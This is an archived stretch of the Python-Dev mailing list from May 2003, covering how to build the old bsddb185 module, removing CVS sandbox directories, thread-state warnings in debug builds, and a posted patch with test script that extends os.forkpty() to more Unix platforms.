References: <16050.36653.443229.45811@montanaro.dyndns.org>        <3EB2A47F.8000706@v.loewis.de> <16050.44080.588636.503705@montanaro.dyndns.org>
Message-ID: <3EB30008.4010603@v.loewis.de>

Skip Montanaro wrote:

[building bsddb185]
> I suppose that's an alternative, however, it is complicated by a couple
> issues:
> 
>     * The bsddb185 module would have to be built as bsddb (not a big deal in
>       and of itself).

Why is that? I propose to build the bsddb185 module as bsddb185. It does 
not support being built as bsddb[module].

>     * The current bsddb package directory would have to be renamed or not
>       installed to avoid name clashes.

I suggest no such thing, and I agree that this would not be desirable.

Regards,
Martin




From skip@pobox.com  Sat May  3 01:11:53 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 2 May 2003 19:11:53 -0500
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <3EB30008.4010603@v.loewis.de>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
 <3EB2A47F.8000706@v.loewis.de>
 <16050.44080.588636.503705@montanaro.dyndns.org>
 <3EB30008.4010603@v.loewis.de>
Message-ID: <16051.2377.270099.748537@montanaro.dyndns.org>

    Skip> I suppose that's an alternative, however, it is complicated by a
    Skip> couple issues:
    Skip> 
    Skip> * The bsddb185 module would have to be built as bsddb (not a big
    Skip>   deal in and of itself).

    Martin> Why is that? I propose to build the bsddb185 module as
    Martin> bsddb185. It does not support being built as bsddb[module].

    Skip> * The current bsddb package directory would have to be renamed or
    Skip>   not installed to avoid name clashes.

    Martin> I suggest no such thing, and I agree that this would not be
    Martin> desirable.

My apologies, Martin.  I guess I misunderstood what you suggested.  (I
suspect Nick Vargish may have as well.)  My interpretation of his complaint
is that he doesn't have a functioning bsddb module and wants the old module
back.  He wants to be able to install Python and have "bsddb" be the module.
As currently constituted, I think Modules/bsddbmodule.c can only be built as
"bsddb185" because of the symbols in the file.  How can Nick build that as
"bsddb"?  Furthermore, how can you guarantee that the bsddb package
directory won't be found before the bsddb module during a module search
(short, perhaps of statically linking the module into the interpreter)?

Skip



From pje@telecommunity.com  Sat May  3 01:29:12 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Fri, 02 May 2003 20:29:12 -0400
Subject: [Python-Dev] removing csv directory from nondist/sandbox -
 how?
In-Reply-To: <16051.1035.821998.148196@montanaro.dyndns.org>
Message-ID: <5.1.0.14.0.20030502202821.02563020@mail.telecommunity.com>

At 06:49 PM 5/2/03 -0500, Skip Montanaro wrote:
>Taking a cue from Raymond's sandbox/itertools cleanup, I cvs removed the
>contents of sandbox/csv just now.  How do I get rid of the sandbox/csv
>directory itself?  I see that the itertools directory remains as well, even
>though I executed "cvs -dP ." from the sandbox directory.

You can't remove directories from a CVS server unless you have direct 
access to it.  And if you remove the directory, its history goes with it.




From martin@v.loewis.de  Sat May  3 01:25:03 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Sat, 03 May 2003 02:25:03 +0200
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <16051.2377.270099.748537@montanaro.dyndns.org>
References: <16050.36653.443229.45811@montanaro.dyndns.org>        <3EB2A47F.8000706@v.loewis.de>        <16050.44080.588636.503705@montanaro.dyndns.org>        <3EB30008.4010603@v.loewis.de> <16051.2377.270099.748537@montanaro.dyndns.org>
Message-ID: <3EB30C5F.90801@v.loewis.de>

Skip Montanaro wrote:

> My apologies, Martin.  I guess I misunderstood what you suggested.  (I
> suspect Nick Vargish may have as well.)  My interpretation of his complaint
> is that he doesn't have a functioning bsddb module and wants the old module
> back.  

That's the larger of his complaints. There is also a subcomplaint: 
Building the new bsddb185 module is not automatic, so he has to give 
explicit instructions to his admins.

> He wants to be able to install Python and have "bsddb" be the module.

He would want it that way. However, he could also accept importing 
bsddb185 as bsddb. He cannot accept having to edit Modules/Setup,
and he cannot accept building Sleepycat [34].x

> As currently constituted, I think Modules/bsddbmodule.c can only be built as
> "bsddb185" because of the symbols in the file.  How can Nick build that as
> "bsddb"?  

He can't. He can build it as bsddb185. However, his complaint is that 
setup.py doesn't do that for him.

> Furthermore, how can you guarantee that the bsddb package
> directory won't be found before the bsddb module during a module search
> (short, perhaps of statically linking the module into the interpreter)?

I don't think the module should be bsddb; I renamed the init function on 
purpose. All I'm suggesting is that it be automatically built by setup.py.

People can accept changing their Python code. They cannot accept having 
to ask more favours from their sysadmins.

Regards,
Martin




From andymac@bullseye.apana.org.au  Fri May  2 23:45:27 2003
From: andymac@bullseye.apana.org.au (Andrew MacIntyre)
Date: Sat, 3 May 2003 09:45:27 +1100 (edt)
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <16050.44080.588636.503705@montanaro.dyndns.org>
Message-ID: <Pine.OS2.4.44.0305030940450.136-100000@tenring.andymac.org>

On Fri, 2 May 2003, Skip Montanaro wrote:

>     Martin> Skip Montanaro wrote:
>     >> Feedback appreciated.
>
>     Martin> I think we need to build bsddb185 automatically under certain
>     Martin> conditions. I have encouraged a user to submit a patch in that
>     Martin> direction.
>
> I suppose that's an alternative, however, it is complicated by a couple
> issues:
>
>     * The bsddb185 module would have to be built as bsddb (not a big deal in
>       and of itself).
>
>     * The current bsddb package directory would have to be renamed or not
>       installed to avoid name clashes.
>
> I don't think there's a precedent for the second issue.  The make install
> target installs everything in Lib.  I think The decision about whether the
> package or the module gets installed would be made in setup.py.  The
> coupling between the two increases the complexity of the process.  I smell
> an ugly hack in the offing.

Could you not have the following?
 - build bsddb if the Sleepycat libraries are found;
 - build bsddb185 if the DB 1.85 libraries can be found;
 - where bsddb is imported, try importing bsddb, and if that
   fails try importing bsddb185 as bsddb (or as * inside the bsddb pkg).
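
A minimal sketch of that fallback, assuming a bsddb185 module has actually
been built (names are illustrative only, not from any checked-in code):

try:
    import bsddb                     # new Sleepycat-based package
except ImportError:
    try:
        import bsddb185 as bsddb     # old DB 1.85 module as a stand-in
    except ImportError:
        bsddb = None                 # neither flavour is available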

--
Andrew I MacIntyre                     "These thoughts are mine alone..."
E-mail: andymac@bullseye.apana.org.au  | Snail: PO Box 370
        andymac@pcug.org.au            |        Belconnen  ACT  2616
Web:    http://www.andymac.org/        |        Australia



From barry@python.org  Sat May  3 03:02:45 2003
From: barry@python.org (Barry Warsaw)
Date: 02 May 2003 22:02:45 -0400
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building
 bsddb185 module
In-Reply-To: <3EB30008.4010603@v.loewis.de>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
 <3EB2A47F.8000706@v.loewis.de>
 <16050.44080.588636.503705@montanaro.dyndns.org>
 <3EB30008.4010603@v.loewis.de>
Message-ID: <1051927365.4302.3.camel@anthem>

On Fri, 2003-05-02 at 19:32, "Martin v. Löwis" wrote:

> [building bsddb185]
> > I suppose that's an alternative, however, it is complicated by a couple
> > issues:
> >
> >     * The bsddb185 module would have to be built as bsddb (not a big deal in
> >       and of itself).
>
> Why is that? I propose to build the bsddb185 module as bsddb185. It does
> not support being built as bsddb[module].
>
> >     * The current bsddb package directory would have to be renamed or not
> >       installed to avoid name clashes.
>
> I suggest no such thing, and I agree that this would not be desirable.

I totally agree with Martin.  Make bsddb185 explicit and do not
masquerade it as bsddb by default.

-Barry




From barry@python.org  Sat May  3 03:04:17 2003
From: barry@python.org (Barry Warsaw)
Date: 02 May 2003 22:04:17 -0400
Subject: [Python-Dev] removing csv directory from nondist/sandbox - how?
In-Reply-To: <16051.1035.821998.148196@montanaro.dyndns.org>
References: <16051.1035.821998.148196@montanaro.dyndns.org>
Message-ID: <1051927457.4302.5.camel@anthem>

On Fri, 2003-05-02 at 19:49, Skip Montanaro wrote:
> Taking a cue from Raymond's sandbox/itertools cleanup, I cvs removed the
> contents of sandbox/csv just now.  How do I get rid of the sandbox/csv
> directory itself?  I see that the itertools directory remains as well, even
> though I executed "cvs -dP ." from the sandbox directory.

Check to make sure you don't have any dot-files left in the directory. 
-P should definitely zap it if there's nothing in there.  You really
don't want to remove the directory from the repository (for a number of
reasons).

-Barry




From tim.one@comcast.net  Sat May  3 03:49:04 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 02 May 2003 22:49:04 -0400
Subject: [Python-Dev] New thread death in test_bsddb3
In-Reply-To: <3EB301C7.5000508@v.loewis.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEMNEEAB.tim.one@comcast.net>

[Martin v. Löwis]
> There are many good reasons; here is one scenario:
>
> Application A calls embedded Python. It creates thread state T1 to do
> so. Python calls library L1, which releases GIL. L1 calls L2. L2 calls
> back into Python. To do so, it allocates a new thread state, and
> acquires the GIL. All in one thread.
>
> L2 has no idea that A has already allocated a thread state for this
> thread. With the new API, L2 does not need any longer to create a thread
> state. However, in older Python releases, this was necessary, so
> libraries do such things.

I understand that some people did this (we've bumped into two so far,
right?), but don't agree it was necessary:  the thrust of Mark's new code is
to make this easy to do in a uniform way, but people could (and did) build
their own layers of TLS-based Python wrappers before this (Mark is one of
them; a former employer of mine is another).  AFAIK, though, these were
cases where multiple libraries agreed to cooperate.  I don't really care
anymore, since there's a standard way to do this now.

> It is unfortunate that these libraries now break, and I wish the new
> API would not be enforced so strictly yet.

If it were enforced in a release build I'd agree, but it isn't -- a release
build enforces nothing new here, and I want to be punched in the groin when
a debug build spots dubious practice.

>> I already gave you my best guesses about those (no, yes).

> I think your guess is wrong: In the past, it was often *necessary* to
> have multiple thread states allocated for a single thread. There was
> simply no other option. So it can't be that this was not allowed.

It's a new world now -- let's get on with it.  Fighting for the right to
retain lame code (judged by current stds, whether or not it was lame before)
isn't a cause I'll sign up for, and especially not when it's in an extremely
error-prone area of the C API, and certainly not when it's so easy to repair
too.  But if you're determined to let slop slide in the debug build, check
in a change to stop the warning -- it's not important enough to me to keep
arguing about it.  I don't think you'd be doing anyone a real favor, and
I'll leave it at that.




From martin@v.loewis.de  Sat May  3 02:52:41 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Sat, 03 May 2003 03:52:41 +0200
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <Pine.OS2.4.44.0305030940450.136-100000@tenring.andymac.org>
References: <Pine.OS2.4.44.0305030940450.136-100000@tenring.andymac.org>
Message-ID: <3EB320E9.4020409@v.loewis.de>

Andrew MacIntyre wrote:

> Could you not have the following?
>  - build bsddb if the Sleepycat libraries are found;

That is happening now.

>  - build bsddb185 if the DB 1.85 libraries can be found;

That is what I'm proposing. Volunteers should step forward.

>  - where bsddb is imported, try importing bsddb, and if that
>    fails try importing bsddb185 as bsddb (or as * inside the bsddb pkg).

I'm strongly opposed to that. Users of bsddb185 need to
make an explicit choice that they want to use that library. Otherwise,
we would have to deal with the bug reports resulting from the brokenness 
of the library forever.

Regards,
Martin




From tim.one@comcast.net  Sat May  3 04:16:35 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 02 May 2003 23:16:35 -0400
Subject: [Python-Dev] removing csv directory from nondist/sandbox - how?
In-Reply-To: <16051.1035.821998.148196@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMPEEAB.tim.one@comcast.net>

[Skip Montanaro]
> Taking a cue from Raymond's sandbox/itertools cleanup, I cvs removed
> the contents of sandbox/csv just now.  How do I get rid of the
> sandbox/csv directory itself?  I see that the itertools directory
> remains as well, even though I executed "cvs -dP ." from the sandbox
> directory.

-P won't remove a directory if there's any file remaining in the directory
that wasn't checked in.  This includes dot files (as Barry said), .rej files
left behind by old rejected patches, temp scripts or output files you may
have created, or a build directory created by setup.py.  I had to get rid of
all of those before CVS deleted my csv directory (normally I just do deltree
(rm -rf) on a dead directory, and CVS won't recreate it then, but I did it
by hand this time just to verify how -P works).



From noah@noah.org  Sat May  3 11:36:53 2003
From: noah@noah.org (Noah Spurrier)
Date: Sat, 03 May 2003 03:36:53 -0700
Subject: [Python-Dev] posixmodule.c patch to support forkpty (patch against posixmodule.c
 Revision 2.241.2.1)
Message-ID: <3EB39BC5.50702@noah.org>

This is a multi-part message in MIME format.
--------------020003030503000503080704
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi,

I have been taking a hard look at Python 2.3b and support for
pseudo-ttys seems to be much better. It looks like os.openpty() was
updated to provide support for a wider range of pseudo ttys.
Unfortunately os.forkpty() was not also updated.

I am attaching a patch that allows os.forkpty() to run on the
same platforms that os.openpty() supports. In other words, os.forkpty()
will use os.fork() and os.openpty() on platforms that don't
already have forkpty(). Note that since the pty module calls os.forkpty(),
this patch will also allow pty.fork() to work properly on more platforms.
Most importantly to me, this patch will allow os.forkpty()
to work on Solaris.

This patch was diffed against posixmodule.c Revision 2.241.2.1 Python 2.3b.

This patch moves most of the logic out of the posix_openpty() C function into
a function that can be shared by both posix_openpty() and posix_forkpty().
Although the posix_openpty() logic was moved, it was unchanged. I think I
kept the code neat despite all the messy #if's that always accompany pty code.

I am also attaching a test script, test_forkpty.py (based on test_openpty.py),
that tests the basic ability to fork and read and write a pty.

I am testing it with my Pexpect module which makes heavy use of
the pty module. With the patch Pexpect passes all my unit tests on Solaris.
Pexpect has been tested on Linux, OpenBSD, Solaris, and Cygwin.
I'm looking for an OS X server to test with.

Yours,
Noah

--------------020003030503000503080704
Content-Type: text/plain;
 name="test_forkpty.py"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="test_forkpty.py"

#!/usr/bin/env python2.3

import os, sys, time
from test.test_support import TestSkipped
verbose = 1

try:
    if verbose:
        print "Calling os.forkpty()"
    pid, fd = os.forkpty()
    if verbose:
        print "(pid, fd) = (%d, %d)" % (pid, fd)
except AttributeError:
    raise TestSkipped, "No forkpty() available."

if pid == 0:  # child
    print "I am not a robot!"
    sys.stdout.flush()
else:  # parent
    time.sleep(1)
    print "The robot says: ", os.read(fd, 100)
    os.close(fd)

--------------020003030503000503080704
Content-Type: text/plain;
 name="posixmodule.c.patch"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="posixmodule.c.patch"

*** posixmodule.c	Tue Apr 22 22:39:17 2003
--- new.posixmodule.c	Sat May  3 06:11:04 2003
***************
*** 2597,2685 ****
  #endif /* defined(HAVE_OPENPTY) || defined(HAVE_FORKPTY) || defined(HAVE_DEV_PTMX */
  
  #if defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)
- PyDoc_STRVAR(posix_openpty__doc__,
- "openpty() -> (master_fd, slave_fd)\n\n\
- Open a pseudo-terminal, returning open fd's for both master and slave end.\n");
- 
  static PyObject *
! posix_openpty(PyObject *self, PyObject *noargs)
  {
! 	int master_fd, slave_fd;
  #ifndef HAVE_OPENPTY
! 	char * slave_name;
  #endif
  #if defined(HAVE_DEV_PTMX) && !defined(HAVE_OPENPTY) && !defined(HAVE__GETPTY)
! 	PyOS_sighandler_t sig_saved;
  #ifdef sun
! 	extern char *ptsname();
  #endif
  #endif
  
  #ifdef HAVE_OPENPTY
! 	if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) != 0)
! 		return posix_error();
  #elif defined(HAVE__GETPTY)
! 	slave_name = _getpty(&master_fd, O_RDWR, 0666, 0);
! 	if (slave_name == NULL)
! 		return posix_error();
  
! 	slave_fd = open(slave_name, O_RDWR);
! 	if (slave_fd < 0)
! 		return posix_error();
  #else
! 	master_fd = open(DEV_PTY_FILE, O_RDWR | O_NOCTTY); /* open master */
! 	if (master_fd < 0)
! 		return posix_error();
! 	sig_saved = signal(SIGCHLD, SIG_DFL);
! 	/* change permission of slave */
! 	if (grantpt(master_fd) < 0) {
! 		signal(SIGCHLD, sig_saved);
! 		return posix_error();
! 	}
! 	/* unlock slave */
! 	if (unlockpt(master_fd) < 0) {
! 		signal(SIGCHLD, sig_saved);
! 		return posix_error();
! 	}
! 	signal(SIGCHLD, sig_saved);
! 	slave_name = ptsname(master_fd); /* get name of slave */
! 	if (slave_name == NULL)
! 		return posix_error();
! 	slave_fd = open(slave_name, O_RDWR | O_NOCTTY); /* open slave */
! 	if (slave_fd < 0)
! 		return posix_error();
  #if !defined(__CYGWIN__) && !defined(HAVE_DEV_PTC)
! 	ioctl(slave_fd, I_PUSH, "ptem"); /* push ptem */
! 	ioctl(slave_fd, I_PUSH, "ldterm"); /* push ldterm */
  #ifndef __hpux
! 	ioctl(slave_fd, I_PUSH, "ttcompat"); /* push ttcompat */
  #endif /* __hpux */
  #endif /* HAVE_CYGWIN */
  #endif /* HAVE_OPENPTY */
  
! 	return Py_BuildValue("(ii)", master_fd, slave_fd);
  
  }
  #endif /* defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX) */
  
! #ifdef HAVE_FORKPTY
  PyDoc_STRVAR(posix_forkpty__doc__,
  "forkpty() -> (pid, master_fd)\n\n\
  Fork a new process with a new pseudo-terminal as controlling tty.\n\n\
  Like fork(), return 0 as pid to child process, and PID of child to parent.\n\
  To both, return fd of newly opened pseudo-terminal.\n");
- 
  static PyObject *
  posix_forkpty(PyObject *self, PyObject *noargs)
  {
! 	int master_fd, pid;
  
! 	pid = forkpty(&master_fd, NULL, NULL, NULL);
! 	if (pid == -1)
! 		return posix_error();
! 	if (pid == 0)
! 		PyOS_AfterFork();
! 	return Py_BuildValue("(ii)", pid, master_fd);
  }
  #endif
  
--- 2597,2784 ----
  #endif /* defined(HAVE_OPENPTY) || defined(HAVE_FORKPTY) || defined(HAVE_DEV_PTMX */
  
  #if defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)
  static PyObject *
! __shared_openpty (int * out_master_fd, int * out_slave_fd)
  {
!     int master_fd, slave_fd;
  #ifndef HAVE_OPENPTY
!     char * slave_name;
  #endif
  #if defined(HAVE_DEV_PTMX) && !defined(HAVE_OPENPTY) && !defined(HAVE__GETPTY)
!     PyOS_sighandler_t sig_saved;
  #ifdef sun
!     extern char *ptsname();
  #endif
  #endif
  
  #ifdef HAVE_OPENPTY
!     if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) != 0)
!         return posix_error();
  #elif defined(HAVE__GETPTY)
!     slave_name = _getpty(&master_fd, O_RDWR, 0666, 0);
!     if (slave_name == NULL)
!         return posix_error();
  
!     slave_fd = open(slave_name, O_RDWR);
!     if (slave_fd < 0)
!         return posix_error();
  #else
!     master_fd = open(DEV_PTY_FILE, O_RDWR | O_NOCTTY);
!     if (master_fd < 0){
!         return posix_error();
!     }
!     sig_saved = signal(SIGCHLD, SIG_DFL);
!     /* change permission of slave */
!     if (grantpt(master_fd) < 0) {
!         signal(SIGCHLD, sig_saved);
!         return posix_error();
!     }
!     /* unlock slave */
!     if (unlockpt(master_fd) < 0) {
!         signal(SIGCHLD, sig_saved);
!         return posix_error();
!     }
!     signal(SIGCHLD, sig_saved);
!     slave_name = ptsname(master_fd);
!     if (slave_name == NULL){
!         return posix_error();
!     }
!     slave_fd = open(slave_name, O_RDWR | O_NOCTTY);
!     if (slave_fd < 0){
!         return posix_error();
!     }
  #if !defined(__CYGWIN__) && !defined(HAVE_DEV_PTC)
!     ioctl(slave_fd, I_PUSH, "ptem"); /* push ptem */
!     ioctl(slave_fd, I_PUSH, "ldterm"); /* push ldterm */
  #ifndef __hpux
!     ioctl(slave_fd, I_PUSH, "ttcompat"); /* push ttcompat */
  #endif /* __hpux */
  #endif /* HAVE_CYGWIN */
  #endif /* HAVE_OPENPTY */
  
!     *out_master_fd = master_fd;
!     *out_slave_fd = slave_fd;
!     return Py_BuildValue("(ii)", master_fd, slave_fd);
! }
  
+ PyDoc_STRVAR(posix_openpty__doc__,
+ "openpty() -> (master_fd, slave_fd)\n\n\
+ Open a pseudo-terminal, returning open fd's for both master and slave end.\n");
+ static PyObject *
+ posix_openpty(PyObject *self, PyObject *noargs)
+ {
+     int master_fd;
+     int slave_fd;
+ 
+     return __shared_openpty (& master_fd, & slave_fd);
  }
  #endif /* defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX) */
  
! /* Use forkpty if available. For platform that don't have it I try to define it. */
! #if defined(HAVE_FORKPTY) || (defined(HAVE_FORK) && (defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)))
  PyDoc_STRVAR(posix_forkpty__doc__,
  "forkpty() -> (pid, master_fd)\n\n\
  Fork a new process with a new pseudo-terminal as controlling tty.\n\n\
  Like fork(), return 0 as pid to child process, and PID of child to parent.\n\
  To both, return fd of newly opened pseudo-terminal.\n");
  static PyObject *
  posix_forkpty(PyObject *self, PyObject *noargs)
  {
! #ifdef HAVE_FORKPTY        /* The easy one */
!     int master_fd, pid;
!     pid = forkpty(&master_fd, NULL, NULL, NULL);
! #else                    /* The hard one */
!     int master_fd, pid;
!     int slave_fd;
!     char * slave_name;
!     int fd;
! 
!     __shared_openpty (& master_fd, & slave_fd);
!     if (master_fd < 0 || slave_fd < 0)
!     {
!         return posix_error();
!     }
!     slave_name = ptsname(master_fd);
  
!     pid = fork();
!     switch (pid) {
!     case -1:
!             return posix_error();
!     case 0: /* Child */
! 
! #ifdef TIOCNOTTY
!         /* Explicitly close the old controlling terminal.
!         Some platforms require an explicit detach of the current controlling tty
!         before we close stdin, stdout, stderr.
!         OpenBSD says that this is obsolete, but doesn't hurt. */
!         fd = open("/dev/tty", O_RDWR | O_NOCTTY);
!         if (fd >= 0) {
!             (void) ioctl(fd, TIOCNOTTY, (char *)0);
!             close(fd);
!         }
! #endif /* TIOCNOTTY */
! 
!         /* The setsid() system call will place the process into its own session
!             which has the effect of disassociating it from the controlling terminal.
!             This is known to be true for OpenBSD.
!          */
!         if (setsid() < 0){
!             return posix_error();
!         }
! 
! 
!         /* Verify that we are disconnected from the controlling tty. */
!         fd = open("/dev/tty", O_RDWR | O_NOCTTY);
!         if (fd >= 0) {
!             close(fd);
!             return posix_error();
!         }
! 
! #ifdef TIOCSCTTY
!         /* Make the pseudo terminal the controlling terminal for this process
!          (the process must not currently have a controlling terminal).
!         */
!         if (ioctl(slave_fd, TIOCSCTTY, (char *)0) < 0){
!             return posix_error();
!         }
! #endif /* TIOCSCTTY */
! 
!         /* Verify that we can open to the slave pty file. */
!         fd = open(slave_name, O_RDWR);
!         if (fd < 0){
!             return posix_error();
!         }
!         else
!             close(fd);
! 
!         /* Verify that we now have a controlling tty. */
!         fd = open("/dev/tty", O_WRONLY);
!         if (fd < 0){
!             return posix_error();
!         }
!         else {
!             close(fd);
!         }
! 
!         (void) close(master_fd);
!         (void) dup2(slave_fd, 0);
!         (void) dup2(slave_fd, 1);
!         (void) dup2(slave_fd, 2);
!         if (slave_fd > 2)
!             (void) close(slave_fd);
!         pid = 0;
!         break;
!     default:
!         /* PARENT */
!         (void) close(slave_fd);
!     }
! #endif
! 
!     if (pid == -1)
!         return posix_error();
!     if (pid == 0)
!         PyOS_AfterFork();
!     return Py_BuildValue("(ii)", pid, master_fd);
  }
  #endif
  
***************
*** 6994,7000 ****
  #if defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)
  	{"openpty",	posix_openpty, METH_NOARGS, posix_openpty__doc__},
  #endif /* HAVE_OPENPTY || HAVE__GETPTY || HAVE_DEV_PTMX */
! #ifdef HAVE_FORKPTY
  	{"forkpty",	posix_forkpty, METH_NOARGS, posix_forkpty__doc__},
  #endif /* HAVE_FORKPTY */
  #ifdef HAVE_GETEGID
--- 7093,7099 ----
  #if defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)
  	{"openpty",	posix_openpty, METH_NOARGS, posix_openpty__doc__},
  #endif /* HAVE_OPENPTY || HAVE__GETPTY || HAVE_DEV_PTMX */
! #if defined(HAVE_FORKPTY) || (defined(HAVE_FORK) && (defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)))
  	{"forkpty",	posix_forkpty, METH_NOARGS, posix_forkpty__doc__},
  #endif /* HAVE_FORKPTY */
  #ifdef HAVE_GETEGID

--------------020003030503000503080704--



From martin@v.loewis.de  Sat May  3 13:23:09 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 03 May 2003 14:23:09 +0200
Subject: [Python-Dev] posixmodule.c patch to support forkpty (patch against posixmodule.c Revision 2.241.2.1)
In-Reply-To: <3EB39BC5.50702@noah.org>
References: <3EB39BC5.50702@noah.org>
Message-ID: <m3he8cb4nm.fsf@mira.informatik.hu-berlin.de>

Noah Spurrier <noah@noah.org> writes:

> I am attaching a patch 

Please see

http://www.python.org/dev/devfaq.html#a2

Please don't post patches to python-dev.

> This patch was diffed against posixmodule.c Revision 2.241.2.1 Python 2.3b.

Please generate patches against the mainline, not against branches.

Kind regards,
Martin


From noah@noah.org  Sat May  3 15:10:12 2003
From: noah@noah.org (Noah Spurrier)
Date: Sat, 03 May 2003 07:10:12 -0700
Subject: [Python-Dev] posixmodule.c patch to support forkpty (patch against
 posixmodule.c Revision 2.241.2.1)
In-Reply-To: <m3he8cb4nm.fsf@mira.informatik.hu-berlin.de>
References: <3EB39BC5.50702@noah.org> <m3he8cb4nm.fsf@mira.informatik.hu-berlin.de>
Message-ID: <3EB3CDC4.4020306@noah.org>

Sorry... my first patch :-)

Yours,
Noah

Martin v. Löwis wrote:
> Noah Spurrier <noah@noah.org> writes:
>
>> I am attaching a patch
>
> Please see
>
> http://www.python.org/dev/devfaq.html#a2




From skip@pobox.com  Sat May  3 15:22:48 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sat, 3 May 2003 09:22:48 -0500
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building
 bsddb185 module
In-Reply-To: <1051927365.4302.3.camel@anthem>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
 <3EB2A47F.8000706@v.loewis.de>
 <16050.44080.588636.503705@montanaro.dyndns.org>
 <3EB30008.4010603@v.loewis.de>
 <1051927365.4302.3.camel@anthem>
Message-ID: <16051.53432.301308.205335@montanaro.dyndns.org>

    Barry> I totally agree with Martin.  Make bsddb185 explicit and do not
    Barry> masquerade it as bsddb by default.

Okay, that's fine with me.

Skip




From skip@pobox.com  Sat May  3 15:25:28 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sat, 3 May 2003 09:25:28 -0500
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building
 bsddb185 module
In-Reply-To: <1051927365.4302.3.camel@anthem>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
 <3EB2A47F.8000706@v.loewis.de>
 <16050.44080.588636.503705@montanaro.dyndns.org>
 <3EB30008.4010603@v.loewis.de>
 <1051927365.4302.3.camel@anthem>
Message-ID: <16051.53592.704262.929675@montanaro.dyndns.org>

    Barry> I totally agree with Martin.  Make bsddb185 explicit and do not
    Barry> masquerade it as bsddb by default.

    Skip> Okay, that's fine with me.

How about

    http://python.org/sf/727137

then?  I think dbhash should consider bsddb185 as a possibility.  That would
keep Nick Vargish's anydbm programs running, I think.

Skip



From skip@pobox.com  Sat May  3 15:28:52 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sat, 3 May 2003 09:28:52 -0500
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <3EB320E9.4020409@v.loewis.de>
References: <Pine.OS2.4.44.0305030940450.136-100000@tenring.andymac.org>
 <3EB320E9.4020409@v.loewis.de>
Message-ID: <16051.53796.553202.289905@montanaro.dyndns.org>

    >> - where bsddb is imported, try importing bsddb, and if that
    >> fails try importing bsddb185 as bsddb (or as * inside the bsddb pkg).

    Martin> I'm strongly opposed to that. Users of bsddb185 need to make an
    Martin> explicit choice that they want to use that library. Otherwise,
    Martin> we would have to deal with the bug reports resulting from the
    Martin> brokenness of the library forever.

Yeah, but there are places in the core library (like anydbm via dbhash)
which import bsddb and are generally going to be out of the control of end
users.  I think those places need to consider bsddb185 as a possibility.  I
already posted a link to an SF patch.

Skip



From dave@boost-consulting.com  Sat May  3 17:45:10 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 03 May 2003 12:45:10 -0400
Subject: [Python-Dev] Timbot?
Message-ID: <uisssj7xl.fsf@boost-consulting.com>

This has probably already been spotted, but in case it hasn't...

I just googled for Timbot and found:

  http://www.cse.ogi.edu/~mpj/timbot/#Programming


-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From gward@python.net  Sat May  3 20:21:31 2003
From: gward@python.net (Greg Ward)
Date: Sat, 3 May 2003 15:21:31 -0400
Subject: [Python-Dev] optparse docs need proofreading
Message-ID: <20030503192131.GA4689@cthulhu.gerg.ca>

So you're sitting around, wondering what to do with your weekend, and
worrying that the Python 2.3 documentation is not perfect yet.  Well,
you could proofread the documentation for optparse (currently section
6.20 of the "lib" manual), which was converted wholesale from
reStructuredText to LaTeX, and still bears some scars.  Both the
DVI/PS/PDF output and HTML bear close examination.

I'm working on it now, but will undoubtedly miss stuff, so feel free to
email any glitches you notice in the latest CVS version to me.

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/


From tim.one@comcast.net  Sun May  4 06:26:09 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 04 May 2003 01:26:09 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <5841710.1051745776@[10.0.1.2]>
Message-ID: <LNBBLJKPBEHFEDALKOLCEENNEEAB.tim.one@comcast.net>

[Tim]
>> ...
>> priorityDictionary looks like an especially nice API for this specific
>> algorithm, but, e.g., impossible to use directly for maintaining an N-
>> best queue (priorityDictionary doesn't support multiple values with
>> the same priority, right?

That was wrong:  the dict maps items to priorities, and I read it backwards.
Sorry!

